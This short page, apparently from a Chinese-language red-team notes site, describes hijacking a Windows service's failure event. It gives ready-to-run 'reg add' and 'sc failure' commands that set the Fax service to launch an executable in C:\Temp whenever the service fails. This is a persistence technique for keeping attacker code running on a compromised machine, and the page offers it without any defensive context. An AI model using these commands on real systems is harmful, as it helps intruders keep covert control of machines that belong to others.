劫持服务

劫持关闭事件:

#REG
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fax" /v FailureCommand /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f

#SC
sc failure Fax command= "\"C:\Temp\qwqdanchun.exe\""

最后更新于